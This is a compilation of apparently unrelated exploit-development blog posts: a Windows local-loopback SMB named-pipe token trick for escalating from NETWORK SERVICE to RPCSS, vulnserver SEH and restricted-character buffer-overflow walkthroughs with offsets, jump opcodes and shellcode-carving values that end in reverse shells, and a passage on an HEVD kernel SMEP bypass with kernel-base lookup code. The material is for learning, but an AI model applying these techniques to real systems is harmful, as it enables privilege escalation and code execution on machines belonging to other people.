Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? Well, if you have TCB privilege when doing network authentication, this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, so why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Are there any primitives which SMB supports which allow you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running as NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess
AllAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

SEH Based Buffer Overflow

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (GMON)


Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


Once the application has been downloaded, we run it on our Vista Machine and start fuzzing.


Fuzzing

For fuzzing, I will be using boofuzz, and documentation can be found here:


First off, we connect to the application to test its functionality. Specifically, we will be testing the GMON command as shown below


Here is the boofuzz template/proof-of-concept that I used for fuzzing:


We fire up this python fuzzer and get a crash. 


boofuzz stores its fuzzing results in a SQLite database that can be opened with any DB application. For this, I am using sqlitebrowser, which provides a nice SQLite GUI.

We can see in this result (line 24) that our fuzzer sent 5013 bytes before the crash occurred



Proof-of-concept


Here's the original proof-of-concept that I will be using throughout the exploit development 

We will begin by recreating the crash using this POC


We fire up this POC and examine the crash in Windows Vista using Immunity Debugger. 

We successfully get a crash with our buffer of 41s. 

Since this will be an SEH-based buffer overflow, we look at the SEH chain after the crash, which shows the SEH handler address being overwritten with our 41s


After successfully overwriting the SEH handler, we need to figure out the correct offset. This can be done by feeding our POC a 5100-byte pattern of unique characters.

We will be using Metasploit's pattern_create.rb as shown below.



We then update our POC with the following unique chars and again fire up our exploit.



The POC successfully crashes the vulnserver.exe program again, and we follow the crash in Immunity.

Here we can see that SEH has been overwritten with the following values:
326E4531 & 45336E45


We can use these two values to calculate the offset using Metasploit's pattern_offset.rb

Note: Immunity Debugger's mona.py can also be used to create the pattern and calculate the offset

We get the following offset:

SEH: 3519
nSEH: 3515
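
The offset lookup can also be reproduced without Metasploit. The following is a minimal Python sketch rather than the tooling used above: it assumes the standard Aa0Aa1Aa2... cyclic pattern that pattern_create.rb emits, and the function names are hypothetical.

```python
import string
import struct

def pattern_create(length: int) -> str:
    """Build the Aa0Aa1Aa2... cyclic pattern (upper, lower, digit triples)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(value: int, length: int = 5100) -> int:
    """Locate a 32-bit value, as displayed by the debugger, in the pattern.

    The debugger shows the dword as an integer, so it is packed back into
    little-endian bytes to recover the four pattern characters.
    """
    needle = struct.pack("<I", value).decode("ascii")
    return pattern_create(length).find(needle)

print("nSEH offset:", pattern_offset(0x326E4531))
print("SEH offset:", pattern_offset(0x45336E45))
```

Run against the two values from the crash, this yields 3515 and 3519, which agrees with the offsets listed above.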


We can use these offset values to update the POC one more time and recalculate our buffer


Again, we fire up the updated POC and examine the crash in immunity.

We can see that nSEH has been overwritten with x42s and the SEH has been overwritten with x43s


Redirecting the SEH Handler

At this point, we have successfully accomplished the following:

1. Fuzzed the vulnerable application with a long buffer string
2. Calculated the offset for the SEH handler

One common way (or the only way?) to exploit an SEH-based buffer overflow is to use a POP-POP-RET sequence.

This is possible because when the application crashes and the exception handler is invoked, our malicious buffer is on the stack, and a POP-POP-RET sequence of instructions returns execution into that buffer.

More information about POP-POP-RET can be found in this blog:



The bottom right of the Immunity Debugger crash below shows the current state of the stack after the crash.
Our buffer is loaded at address 00FDF1F0 (note that the values at addresses 00FDF1E8 and 00FDF1EC need to be popped from the stack first)

POP - 00FDF1E8
POP - 00FDF1EC
RET - 00FDF1F0 (returns into our buffer)



Bad characters are no bueno

Before we look for a POP-POP-RET address and redirect our SEH Handler to it, we need to discover bad characters that will truncate or mangle our exploit.

Searching for bad characters can be accomplished by sending all 255 byte values (0x01 to 0xff) and following code execution in Immunity Debugger to see if certain characters truncate or mangle our buffer


Again, execute our POC and trace code execution in immunity debugger. 

Looking at the hex dump (bottom left), we can see the application took all 255 hex characters (0x01 to 0xff) which means that other than  0x00, all hex characters can be used.
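
The comparison between what was sent and what shows up in the dump can be automated. Below is a minimal Python sketch under the assumption that the bytes from the hex dump have been copied out by hand; both function names are hypothetical and the "dump" here is a stand-in, not real debugger output.

```python
def badchar_block(exclude: bytes = b"\x00") -> bytes:
    """All byte values 0x00-0xff except the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)

def find_mangled(sent: bytes, in_memory: bytes) -> list[tuple[int, int, int]]:
    """Return (index, sent_byte, seen_byte) for each position that differs.

    Only the overlapping part is compared, so a dump that is shorter than
    the sent block indicates truncation and should be checked separately.
    """
    return [
        (i, s, m)
        for i, (s, m) in enumerate(zip(sent, in_memory))
        if s != m
    ]

sent = badchar_block()
dump = bytes(sent)          # stand-in: pretend the target kept every byte
print(len(sent), find_mangled(sent, dump))
```

An empty result together with a full-length dump corresponds to the situation described above, where only 0x00 has to be avoided.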


Now we are ready to find any POP-POP-RET address. This can be done using the mona.py plugin in immunity debugger (I couldn't get it to work) or you can just do it manually by opening up the essfunc.dll and searching for these sets of instructions.

I found the POP-POP-RET at address 625010B4


Once again, we update our POC with the SEH Handler redirect address. We examine the crash by adding a breakpoint at address 625010B4 and see if we can hit the breakpoint for a successful redirection.

Note that the address has to be in little-endian format. Also, we added a first jump (EB 06) and 2 NOPs.
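
As an illustration of the byte order, here is a small Python sketch of the two 4-byte fields, using only the values quoted above; the variable names are hypothetical. The displacement 06 is counted from the end of the 2-byte jump, so it skips the two NOPs and the 4-byte handler address.

```python
import struct

POP_POP_RET = 0x625010B4    # address quoted in the text above

# "<I" packs an unsigned 32-bit value with the least significant byte first.
seh = struct.pack("<I", POP_POP_RET)

# nSEH: short jump (EB 06) followed by two NOPs, 4 bytes in total.
nseh = b"\xeb\x06" + b"\x90" * 2

print(nseh.hex(), seh.hex())
```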



We get another crash and examine the SEH chain, which shows our POP-POP-RET address. If we allow the exception to happen, we are successfully redirected to address 625010B4



We step through the POP-POP-RET instructions and then hit our first jump (EB 06).


...once we take the jmp, we hit address 00EFFF7D. This gives us roughly 70 bytes of address space. This space is not enough for a reverse or bind shellcode; however, we can use it to jump further.


For our second jump, I am using the following instructions which were straight from the OSCE course. 

These instructions basically move the address of EIP into ECX, then ECX is decreased before the jump is taken.


These instructions can be written to a NASM file and assembled; objdump can then be used to extract the opcodes.

Below shows these instructions and their respective opcodes


Note that at this point, ECX points to address 00EFFD87. We step through the instructions, take the jump, and follow the new EIP 00EFFD87 in the dump, which gives us a bigger address space of roughly 512 bytes
00EFFF8B - 00EFFD87 = 0x204 (516 in decimal)

We update our POC once again with these jump instructions and now we are afforded an address space big enough for our shellcode.


SHELL TIME!

We create a reverse shell.


We update our POC buffer one last time


We execute our POC again and follow code execution in our debugger

After taking our second jump, we hit our NOPs, and if we follow EIP in the dump, we can see that our encoded shellcode sits right below them.


If we continue code execution, we hit our shellcode and get a reverse shell in kali


Final POC




Conclusion:

  1. Fuzzed the vulnerable application with a long buffer string
  2. Calculated the offset for the SEH handler
  3. Determined whether there are any bad characters
  4. Found a POP-POP-RET address to access our buffer
  5. Used the 4 bytes @ offset 3515 to do our first jump into a 70-byte address space
  6. Used the 70-byte address space for the second jump, which gave us roughly 512 bytes of address space
  7. Added shellcode

SEH Based Buffer Overflow with Restricted Characters

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability w/ Restricted Characters


Kali Linux
Windows Vista 
Vulnerable application: vulnserver.exe (LTER)


Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:



Github: https://github.com/pyt3ra/SEH-based-Buffer-Vulnerablity-128-Restricted-Hex-Characters-

~~~~~//********//~~~~~~

Fuzzing 

Fuzzing with boofuzz



We open the boofuzz result using SQLite browser


Recreating the crash with our Proof-of-concept


As usual, we examine the crash using Immunity Debugger and see that our SEH handler address has been overwritten with our buffer



Calculating Offset

We use Metasploit's pattern_create.rb and pattern_offset.rb to generate unique characters and calculate the offset.

Updated POC


The following values overwrite the SEH handler


...which then equates to the following offset positions.


Once again, we update the Proof-of-Concept with the following offset calculations and verify if we can see these values after the crash



Finding restricted characters


After running a few tests, it looks like anything over 7F has 7F subtracted from it, as we can see below in our dump, such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f


At this point we have successfully done the following:

1. Successfully produced a crash to the program with the buffer we provided
2. Calculated the offset values for address redirection
3. Found all the restricted characters

POP-POP-RET...the key to SEH Based Buffer Overflow Vulnerabilities


I will be using the same POP-POP-RET address from the Vulnserver.exe (GMON) write-up


Updated the POC with the following values...I also added some NOPs for the other 4 bytes


We cannot forget about the restricted characters (hex 80 to FF)

We get a crash; however, we can see that our POP-POP-RET address has been changed from 625010B4 to 62501035, where the last byte has been changed (B4 - 7F = 35)

Also note that our 90s have been changed to 11 (90 - 7F = 11)...we will worry about this part later
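
The mangling can be modelled in a few lines of Python to predict how a given payload will look in memory. This is only a sketch of the behaviour observed in the dump (bytes above 7F lose 7F), not vulnserver's actual code, and the function name lter_filter is hypothetical.

```python
def lter_filter(data: bytes) -> bytes:
    """Model of the observed mangling: bytes above 0x7F have 0x7F subtracted."""
    return bytes(b - 0x7F if b > 0x7F else b for b in data)

for sample in (b"\x80", b"\x90\x90", b"\xb4\x10\x50\x62"):
    print(sample.hex(), "->", lter_filter(sample).hex())
```

The last sample is the little-endian form of 625010B4, which comes out as the bytes of 62501035, the address seen in the SEH chain.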


We found another POP-POP-RET address


Again, we update the POC with this new POP-POP-RET address


We fire up the POC and set a breakpoint in immunity. As we check the SEH chain plugin, we can confirm that we were able to redirect the SEH handler to the address 6250120B


We allow the execution and hit our breakpoint


We step through the POP POP RET instructions, and we hit our first entry (x90s) or in this case, x11s (90 - 7F)


First Jump 

After we are redirected to the pop-pop-ret address we are then sent to the 4 bytes right before it. We will have to use these 4 bytes to get our first jump

For the first jmp we will use the jnz conditional jump and fill the extra bytes with inc eax. With GMON we used EB 06 (a 6-byte short jump); however, EB is unusable since it is one of the restricted characters.

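At this time, eax is 0x00000000, so I used an inc instruction to clear the ZF (note that on 32-bit x86 the byte 41 decodes as inc ecx, while inc eax is 40; either one clears ZF as long as the result is non-zero), followed by the jump-if-not-zero (jnz) instruction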

This jumps past our SEH handler address. Also, note that if we follow it in the dump, we can see we only have 48 bytes of address space, which is not enough for a reverse/bind shell.


Second jump

Now we have 48 bytes that we can use to do our second jump while keeping in mind the restricted characters.
To circumvent the restricted characters, we will be 'carving' our shellcode with SUB instructions

More info about shellcode carving can be found here: http://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/

First, we will need to realign our stack so that we will know where our decoded jump will show up. In this case, we want our decoded jump opcodes just below our first jump at the following address:



Before we carve it out, we have to realign ESP to address 00E9FFF8 which can be done with the following instructions:

(1)
push esp
pop eax               ;move the value of esp to eax
add ax, 0x0d75    ;add 3445 to ax (the low 16 bits of eax)
add ax, 0x0465    ;add 1125 to ax
push eax             ;push new eax value to the stack
pop esp              ;move the value of eax to esp

Note that after we do this, we will need to zero out eax for shellcode carving to work

There are multiple ways to zero out eax (e.g. xor eax, eax); however, this will not work due to restricted characters (the second byte of xor eax, eax is C0, which is above 7F)

We will use the AND operator using the following values

(2)
AND 554E4D4A = 0101 0101 0100 1110 0100 1101 0100 1010
AND 2A313235 = 0010 1010 0011 0001 0011 0010 0011 0101
------------------------------------------------------
             = 0000 0000 0000 0000 0000 0000 0000 0000
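
A quick Python check confirms that the two masks share no set bits and that every byte of both stays inside the allowed range; the opcode for AND EAX, imm32 (25) is also below 7F. This is just a verification sketch, and the starting value of EAX is arbitrary.

```python
MASK_A = 0x554E4D4A
MASK_B = 0x2A313235

def is_allowed(value: int) -> bool:
    """True if every byte of the dword is in the 0x01-0x7F range."""
    return all(0x01 <= b <= 0x7F for b in value.to_bytes(4, "little"))

eax = 0xDEADBEEF    # arbitrary starting value, for illustration only
eax &= MASK_A       # AND EAX, 554E4D4A
eax &= MASK_B       # AND EAX, 2A313235
print(hex(eax), is_allowed(MASK_A), is_allowed(MASK_B))
```

Because the masks have no bit in common, the result is zero regardless of what EAX held beforehand.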

(3)
For our second jump, we will be using a reverse short jump: EB 80 

In order to carve out EB 80 we use the following values:

\xeb\x80\x90\x90 = 909080EB (as a little-endian dword)
0 - 909080EB = 6F6F7F15
32103355 + 32103355 + 0B4F186B = 6F6F7F15
0 - 32103355 - 32103355 - 0B4F186B = 909080EB
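
The carving arithmetic can be checked with 32-bit wrap-around subtraction. The Python sketch below only verifies the values listed above; it is not a general encoder. The opcode for SUB EAX, imm32 (2D) is itself within the allowed range.

```python
import struct

# The four target bytes as a little-endian dword: 0x909080EB
TARGET = struct.unpack("<I", b"\xeb\x80\x90\x90")[0]
SUBS = (0x32103355, 0x32103355, 0x0B4F186B)

eax = 0                                  # EAX was zeroed by the AND pair
for value in SUBS:
    eax = (eax - value) & 0xFFFFFFFF     # SUB EAX, imm32 wraps at 32 bits

print(hex(eax), struct.pack("<I", eax).hex())
```

Pushing the resulting EAX writes the bytes EB 80 90 90 to the stack in that order, since PUSH stores the dword in little-endian form.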

We will do SUB operations with these values then push the result to the stack

After everything is said and done, our second jump will look like this



We execute our updated POC and trace code execution in immunity debugger

Here we can see that our second jump instructions start at address 00EFFFD1 and the EB 80 instruction is then carved at address 00EFFFFA

Once we take the jmp short 80h, we get another 72-byte address space that we can work with. This can be seen in our hex dump at address 00EFFF7C


Third Jump

After the second jump, the address space is still not big enough for reverse or bind shell...which means we will need to do another jump.

As usual, we will need to realign ESP to set where our decoded instructions will be saved. In this case, ESP currently points at address 00FAFFFD and we would like to point it to 00FAFFAE.

After we store the value of ESP to EAX we execute the following SUB instruction

SUB AL, 4F (00FAFFFD - 4F = 00FAFFAE)

We then pop this address back to ESP


After we run the following instructions, we can see that ESP points to address 00FAFFAE…this is where our decoded jump instructions will be stored


For the third jump, we will be using the following instructions:


\x81\xec\x48\x0d\x00\x00 (SUB ESP, 0D48)
\xff\xe4                                   (JMP ESP)
00FAFFAE - 0D48 = 00FAF266

00FAF266 is an address just below the beginning of our buffer....this will give us about 3400 bytes worth of address space for our final shellcode

We will be carving 4 bytes at a time beginning at the lowest 4 bytes (since this will be pushed into the stack in LIFO manner)

As usual, we zero out EAX first then carve the instructions using SUB instructions before EAX gets pushed into the stack
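
Splitting the eight instruction bytes into two dwords and pushing them in reverse order can be sketched as follows. This is only an illustration in Python using the byte string quoted above; the ESP value 00D0FFBB is the one reported later in this write-up, and the variable names are hypothetical.

```python
import struct

code = bytes.fromhex("81ec480d0000ffe4")    # SUB ESP, imm32 ; JMP ESP

# Split into little-endian dwords. The last dword is pushed first so that
# the bytes end up in the original order at ascending addresses.
dwords = struct.unpack("<2I", code)
push_order = list(reversed(dwords))
print([hex(d) for d in push_order])

# The immediate operand of SUB ESP sits in bytes 2..5 of the instruction.
imm32 = struct.unpack("<I", code[2:6])[0]
print(hex(imm32), imm32)

# ESP after the SUB, starting from the address where the code was decoded.
print(hex(0x00D0FFBB - imm32))
```

Each of the two dwords still contains bytes above 7F, which is why both have to be carved with SUB instructions rather than sent directly.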


Here we can see our 4 bytes getting decoded at address 00D0FFBF


...we carve out the next 4 bytes


...and follow the instructions being decoded


This completes our third jump, as we can see that we have successfully decoded our next jump instructions @ address 00D0FFBB:

SUB ESP, 0D48

JMP ESP


We continue code execution to get to our SUB ESP and JMP ESP

Here we can see that after the SUB instruction, ESP points to 00D0F273


We take the JMP ESP and we are provided with 3000+ bytes of address space for our final shellcode


Final Shellcode 


At this point, we can use MSF to create a reverse shell encoded with alpha_mixed.

Also, note that we need to add BufferRegister=ESP to get rid of some restricted characters at the beginning of the shellcode. 

More info about BufferRegister flag can be found here: https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/



Buffer Overflow w/ Restricted Characters

Buffer Overflow Vulnerability w/ Restricted Characters

Kali Linux
Windows Vista
Vulnerable application: vulnserver.exe (LTER)


Vulnserver.exe is meant to be exploited mainly through buffer overflow vulnerabilities. More info about this application and where to download it can be found here:



~~~~~//********//~~~~~~


For the LTER command, there are two ways to exploit the buffer overflow vulnerability; however, both exploits will have similar restricted characters

- Part 1: Vanilla Buffer Overflow w/ Restricted Characters
- Part 2: SEH-based Buffer Overflow w/ Restricted Characters

Let's get started...

Fuzzing

Similar to the GMON write-up, I used boofuzz to do the initial fuzzing.

...and after crashing the program, we recreate the crash using the following Proof-of-Concept


We get a pretty vanilla buffer overflow where the EIP has been overwritten with 41s

Also note that ESP currently points to our buffer. This is key once we figure out an address to redirect our EIP


Now we will need to determine our offset and see exactly which part of our buffer overwrites the EIP register.

As usual, this is accomplished using Metasploit's pattern_create.rb to generate 3000 unique characters.


Update our POC with our unique characters, send the exploit, and examine the crash in immunity debugger.


Here we can see that EIP has been overwritten with the following values: 386F4337


Metasploit's pattern_offset.rb can be used to determine the offset with this value.

Once we determine the offset, we update our POC again



We send the POC one more time and examine the crash...if our offset is correct, EIP should be overwritten with x42s

In this case, we can see 42424242 were successfully loaded into the EIP register


Finding bad characters

Now that we are able to control EIP, we will need to find an address to redirect it to. Since we know that the ESP register points to our buffer, we will be looking for a JMP ESP address.

However, before we choose an address, we will need to verify if there are any bad characters.

We update the POC with the following 256 unique hex characters


After running a few tests, it's verified that anything over 7F has 7F subtracted from it, as we can see below in our dump, such that x80 - x7F = x01

This means we will not be able to use any hex characters over 7F

Allowed characters:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f



Now we will need a call esp or jmp esp address. This will ultimately redirect execution to our 'Cs', where our reverse shell will be loaded, while keeping in mind the restricted characters.

We find the following address using mona.py in immunity debugger

FF E4 = jmp esp
Address: 62501203
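
Whether a candidate address survives the character restriction can be checked byte by byte. The following Python sketch is a hypothetical helper, not mona.py functionality; the other two addresses tested are the POP-POP-RET addresses quoted in the GMON and SEH LTER write-ups.

```python
def address_survives(addr: int) -> bool:
    """True if all four address bytes are in the allowed 0x01-0x7F range."""
    return all(0x01 <= b <= 0x7F for b in addr.to_bytes(4, "little"))

for addr in (0x625010B4, 0x6250120B, 0x62501203):
    print(hex(addr), address_survives(addr))
```

Only the first address fails, because its low byte B4 is above 7F.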


We can verify this address is a JMP ESP by searching it



At this point, we can update our POC so that EIP is redirected to this JMP ESP address


As we follow the crash in immunity, we can see that EIP has been successfully overwritten with our JMP ESP address


...once we take the JMP ESP, we are redirected to the top of our Cs




Reverse shell time!

We will need to create our reverse shell and encode it with x86/alpha_mixed in order to avoid the restricted characters


We update our POC one last time

Again we follow the jmp esp and we hit the beginning of our reverse shell. We let the code execution continue and successfully get a reverse shell in our Kali listener.



Final Proof-of-Concept




HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass

By: h0mbre
4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. These were all of the exploits I wanted to hit when I started this goal in late January. We did quite a few; there are definitely some interesting ones left on the table, and there are all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

  • To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
  • To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
  • To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said in every post so far, nothing I was doing is my own idea or technique; I was simply recreating others' exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects kernel mode code executing from userspace pages and raises a fault, which stops us from being able to hijack execution in the kernel and send it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

Bit 20, SMEP (Supervisor Mode Execution Protection Enable): If set, execution of code in a higher ring generates a fault.

So bit 20 of CR4 (counting from bit 0) indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do is get the base address of the kernel. Because of ASLR, the kernel is loaded at a different address on each boot, so without the base address we can’t turn the offsets of the gadgets we want to use into absolute addresses. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_EXECUTE_READWRITE);

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from ntdll.dll and allows us to use it with the System Module Information parameter, which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves, which have a lot of struct members including a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0, so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.
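
The substring match described above can be sketched roughly as follows. This is only an illustration in Python rather than the C++ of the exploit, and it runs over a hand-made module list instead of real NtQuerySystemInformation output. The Module tuple, the find_module_base helper, and every sample path and address other than the nt base from the WinDBG listing are made up for the example.

```python
from typing import NamedTuple, Optional, Sequence


class Module(NamedTuple):
    # Hypothetical stand-in for one SYSTEM_MODULE entry (only two fields kept).
    name: str
    image_base: int


def find_module_base(modules: Sequence[Module], needle: str) -> Optional[int]:
    """Return the base of the first module whose name contains `needle`.

    The comparison is case-insensitive because driver paths are not
    reported with consistent casing.
    """
    needle = needle.lower()
    for mod in modules:
        if needle in mod.name.lower():
            return mod.image_base
    return None


# Sample data: the nt base is the one shown by `lm sm` above,
# the other two entries are invented for illustration.
modules = [
    Module(r"\SystemRoot\system32\ntoskrnl.exe", 0xFFFFF80010C7B000),
    Module(r"\SystemRoot\system32\hal.dll", 0xFFFFF80010C00000),
    Module(r"\??\C:\drivers\HEVD.sys", 0xFFFFF80B3A2D0000),
]

hevd_base = find_module_base(modules, "hevd.sys")
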